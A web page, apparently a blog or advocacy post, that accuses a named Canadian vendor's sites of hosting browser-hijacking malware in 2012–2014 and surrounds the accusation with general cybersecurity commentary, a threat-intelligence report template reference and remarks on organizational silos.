Source: Having a security management process is a must for all Government of Canada clients. The GOVPAGES.ca network server [o/o by veteran GOC client NCM Software Development Inc] is found to have hosted MALICIOUS SOFTWARE on two of it’s business web sites over a 32 month period during 2012, 2013, 2014. The intent of the GOVPAGES.ca hosted malware during these 32 months was to hi-jack visiting web browsers, breach their network security, steal digital property and take OS control of visiting computer networks. Continuous warnings [screenshots provided] were issued by Google Chrome, Microsoft IE, and Mozilla Firefox during this prolonged period of time. Government of Canada “cross-agency priority” [CAP] goals have cyber security at the top of it’s agenda. This subsequent report follows Public Safety Canada interdiction Oct 2014 and concerns host server GOVPAGES.ca, two NCM Software Development Inc registered internet domains [governmentcontacts.com and governmentmailinglists.com], NCM’s weak IT security posture and NCM’s persistent attempts to redirect visiting network browsers to IP 18.104.22.168 [a known (Russian orig/Romanian admin) distributor of malicious software]. This illicit activity carried out during 2012, 2013 and 2014 is corroborated by court admissible evidence.
A View from the Front Lines “Recent media attention has highlighted the proliferation of security breaches affecting us all. These security failures have not only resulted in significant expe…
Source: Google Chrome blocking access to NCM’s ‘browser hi-jacking site’ governmentcontacts.com while depicting a cyber crime in progress, zeros and ones falling to the ground as digital forensic evidence. Screen shot captured May 2013.
Network breaches happen daily in the digital age, so it is imperative that we stand vigilant in our fight against persistent malware threats, while supporting standards that safeguard data privacy and enhances the effective communication of cyber threat incidents and identified intrusion indicators.
Rapid response time is priority. Dwell time must be kept to a minimum.
In Canada, unprecedented cyber-attacks have targeted Defence Research and Development Canada, two key Government of Canada organizations compromised by criminal hackers. The impact suffered has included giving foreign hackers access to highly classified Federal information and at the time, forced the Finance Department and Treasury Board — the GOC’s two main economic nerve centres, off the internet.
The recent revelation [Oct 2014] that a Russian crime ring amassed the world’s largest known collection of stolen Internet credentials, including 1.2 billion username and password combinations and over 500 million email addresses, simply reinforces the fact that cybercrime is something that affects both private and public sector organizations of every size. Spyware and malware are among an organization’s biggest threats and often go unnoticed until it’s too late, due to their elusive nature.
Malware is commonly implemented with a simple one-line script, injected into a compromised website and made to look like normal code. Challenging breeds of malware continue to evolve and become more dangerous while reaching new levels of complexity.
The Train Has Left the Station
It is an unfortunate fact that both private and public sector networks are under constant attack and every organization connected to the internet is a constant target for network intrusion, therefore dwell time and response time is a critical IT/IS priority.
Stealthly criminals infiltrate networks without consent, in several hostile and intrusive ways, including the installation of rootkits, that provide masked administrator-level intrusion to gain root or privileged access and control of the OS. One leading antiroot kit utility is available from Kaspersky labs in Russia, [it will detect and removes known rootkits TDSS, SST, Pihar, ZeroAccess, Sinowal, Whistler, Phanta, Trup, Stoned, RLoader, Cmoser, Cidox), Russian Federation laws apply.
When a network breach is first discovered, every moment is critical. Not only should the organization shut down the network attack, but it must work to minimize resulting collateral damage — and it must do so quickly. Once an intruder has gained super user access, they now control the system.
Malware is defined by its Hidden Malicious Intent.
It’s a race in real time. It’s a race in calendar time. Sometimes, a network may not detect malware until after an infection occurs and vulnerabilities are exploited.
Professionals maintain internal controls, with security updating systems to ensure compliance with industry standards, thus avoiding administrative, criminal or civil liability against the organization and it’s directors.
The Honourable Vic Toews, P.C., Q.C., M.P. Minister of Public Safety
“These criminal groups are breaking into our computer systems, searching through our files, and causing our systems to crash. They are stealing our industrial and national security secrets, and our personal identities”.
Attacks to government and client networks are not only becoming more complex, but also more sophisticated. A GAO study finds that reported attacks increased 782% between 2006 and 2012. Cyber security is one of the most pressing concerns for the public sector. Attacks have been increasing in both volume and speed by cyber criminals attempting to gain access to government networks.
9,084 incidents of cyber crime were reported by Canadian police services in 2012 alone.
“Recent media attention has highlighted the proliferation of security breaches affecting us all. These security failures have not only resulted in significant expense to the organizations affected, but have significantly damaged trust and reputation.
The sensitive data embedded within your networks and systems is a high value target to hackers“.
Patrick Malcolm, Digital Forensics and Cyber Security Expert Trainer, National Capital Region [Ottawa, Canada]
M-Trends Threat report: A View from the Front Lines
Cyber security has gone from a niche IT issue to a boardroom priority and Cross-Agency-Priority (CAP) for business and government organizations.
Executive Order — Promoting Private Sector Cybersecurity Information Sharing
U.S. President Obama signed an executive order that aims to better share cybersecurity threat information.
Canadian Cyber Incident Response Centre (CCIRC) Partners
An organization’s network security is fundamental and must not be treated as optional. CCIRC partners include government, private sector organizations, security researchers and the national cyber security incident response teams (CSIRTs) in other countries. These partnerships enable threat information sharing that is critical to preventing, preparing for, responding to, and recovering from cyber incidents. There are just too many slimy players out there that leverage malware crafted to evoke trust when none is warranted, but do nothing more than steal your assets.
Below is a ‘Report Template’ for Threat Intelligence and Incident Response
When handling intrusions, incident responders often struggle with obtaining and organizing the intelligence related to the actions taken by the intruder and the targeted organizations. Examining all aspects of the event and communicating with internal and external constituents is a challenge in such strenuous circumstances.
The following template is a Threat Intelligence and Incident Response Report which aims to ease this burden. This report provides a framework for capturing the key details and documenting them in a comprehensive, well-structured manner. Zeltser Security Corp – https://zeltser.com/cyber-threat-intel-and-ir-report-template/
This template leverages several models in the cyber threat intelligence (CTI) domain, such as the Intrusion Kill Chain, Campaign Correlation, the Courses of Action Matrix and the Diamond Model. The use of these frameworks helps guide threat intelligence gathering efforts and inform incident response actions.
Download the Report Template
The template is distributed according to the Creative Commons Attribution license (CC BY 4.0), which basically allows you to use it in any way you wish, including commercial purposes, as long as you credit Lenny Zeltser for the creation of the template.
As cyber criminals become more sophisticated and adept in exploiting information technology, it becomes even more important for both private and public sector organizations to develop a risk mitigation strategy to detect, attribute and filter out persistent, malicious threats and adversary operators from our online communities.
How many opportunity dollars have been missed by your company because you don’t use enough information properly, to see the big picture?
Silos are barriers between departments.
Building a team that works well together is the first step an organization must take in order to have any chance of success. Even in the most well intending teams silo walls can appear causing each department to work against each other. It’s one of the most frustrating things you can go through as a business.
- Compensation plans that put an emphasis on different things
- finger pointing
- assuming the other department means harm with every move they make
- reliving the past
- using the term “my people”
- excessive delays
- lobbying for personal interest
- unwillingness to pitch in
- snide remarks
- back channel backbiting
- saying “That’s not my job.”
Silos organically form when there is not a common theme for the office. A ultimate short and long term goal. It can be called a thematic goal. All actions should be directed at hitting that thematic goal.